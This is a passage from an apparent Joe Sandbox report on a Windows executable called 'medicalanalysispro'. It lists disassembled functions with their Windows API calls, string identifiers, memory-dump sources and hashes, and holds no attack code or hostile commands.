                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1ad9dc7dbdf29a182594ae556a1cb248b1c703f99e34dcda866ff1506038bb6f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBB09220F29402C1D64CBB259CC906053A0BF79305FC00831C20E80124FE1C919AD720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE770A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                                                                              • String ID: "$:$@$RegServer
                                                                                                                                                                                                                                                                                                              • API String ID: 1203814774-4077547207
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                              • Instruction ID: abedb755a274a2a174c09aa96ae5d68a720ce2eae3a06b7cf6f05e62cc1959fa
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A02D161A0C68281FAEDBB6C5404279EBA1AF67744FD80531CB5E2669CFE3DE442C730
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                                                                                                                                                                                                              • String ID: $ham
                                                                                                                                                                                                                                                                                                              • API String ID: 2654313074-563232235
                                                                                                                                                                                                                                                                                                              • Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6d7d9cccef9da6c9a05ab0414d525d888292cf390ac0c17b80417388531ef53f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6514331A0CA42C6E7D86B19E944279FA61FFABB55F849231CB1D0279CEF3C94458720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE74A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74A86
                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74AAA
                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74ACA
                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74AEC
                                                                                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74B1B
                                                                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74B3A
                                                                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74B54
                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF7BDE74BF1
                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BDE735E3), ref: 00007FF7BDE74C0D
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 76587e01adf14be2b42441e0610241a14d6ba74b27c3e852970f2bca3a0b2e6f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7514025A0DB8286E689AB19B850579BBA0FBAAB95FC44534DF4E03758EF3CD444C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE74DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                                                                              • String ID: ham$rce.
                                                                                                                                                                                                                                                                                                              • API String ID: 2929476258-2218604853
                                                                                                                                                                                                                                                                                                              • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                              • Instruction ID: 8028441e4845f7bdc74ae4427b78ee82d6c54bc4ac5a1ed8d86cf5599f88469c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B619821E0D78286F799AB29A8003B9E690EF6A754F845130DF4D17799FF3CE541C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE7261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                              • Instruction ID: b0468ecf0b54fb381c9f7ffa89fdc81458dca42836b284df44187f110610b24b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A51847260C68186EB54AB18E8542B9BBA0FB9BB90FD45031DB4E03B58EF3CD445C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE733F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                                                                              • String ID: ham
                                                                                                                                                                                                                                                                                                              • API String ID: 3785188418-4133487753
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9426231e3b0ce47d4d01de2faed133ddb53cfa9ed72bad344ac4e64837e0274b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0312A75A0CA42C6E6D86B28A804274FB61FF9BB51FD49230CA2D06398FF3CA445C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE77F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6f93c7e54ab592906653377dc0f8911ec4b69db69c0bfe2a6d697b416bc0b3f0
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE516336A0CA418AF7999B28E880179F7A5FBAAB54F854131DB5D03798EF3CE544CB10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE711CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                                                                              • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                                                                                                                                              • Instruction ID: 403a583cdb353e4fb1c0b2b1838712b6589d505248451962161b740c644ce85f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4313E3660CB858AD6549F1AF8441A9FBA0FB9AB80F855139EF8D43718EF3CE045CB50
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1051330783-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                              • Instruction ID: a28d5e504d1b834029c6d29e57269f75cc63baa729339c906eea2dcaefcc58cb
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74515A32E0C6529AEB94AF19D8005B8B7A5FB5AB94F949131DF0D63758FF38E441C720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE72A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 975904313-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                              • Instruction ID: 089bd7616b24b4e5b8b147dc51f53b35342748f922ef5742d3a56dab1ab83e4c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8951AB61A0C6C545FBA56F29A4003B9FB91EF6BB94F889171CB8E07789EF3CD4458720
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE74C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2249793289.00007FF7BDE71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7BDE70000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249758434.00007FF7BDE70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249822380.00007FF7BDE79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249857618.00007FF7BDE7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2249891759.00007FF7BDE7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7bde70000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                              • Instruction ID: 20e961d4a3a2c9afd63041248241a313bb74c376245f839b0d8af6db9c00c68b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81319F32B186018AE7549B79E8049BDBBB1FB5EB99F885130CF0A53B08DF3CE4458B10
                                                                                                                                                                                                                                                                                                              Function 00007FF7BDE73F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75078
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: SizeofResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE75089
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FindResourceA.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750AF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LoadResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750C0
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: LockResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750CF
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: memcpy_s.MSVCRT ref: 00007FF7BDE750EE
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE75050: FreeResource.KERNEL32(?,?,00000000,00007FF7BDE72E43), ref: 00007FF7BDE750FD
                                                                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7BDE73139), ref: 00007FF7BDE73F95
                                                                                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00007FF7BDE74018
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: LoadStringA.USER32 ref: 00007FF7BDE74E60
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE74DCC: MessageBoxA.USER32 ref: 00007FF7BDE74EA0
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77700: GetLastError.KERNEL32 ref: 00007FF7BDE77704
                                                                                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7BDE73139), ref: 00007FF7BDE7403E
                                                                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00007FF7BDE73139), ref: 00007FF7BDE7409F
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77AC8: FindResourceA.KERNEL32 ref: 00007FF7BDE77AF2
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77AC8: LoadResource.KERNEL32 ref: 00007FF7BDE77B09
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7BDE77B3F
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007FF7BDE77AC8: FreeResource.KERNEL32 ref: 00007FF7BDE77B51
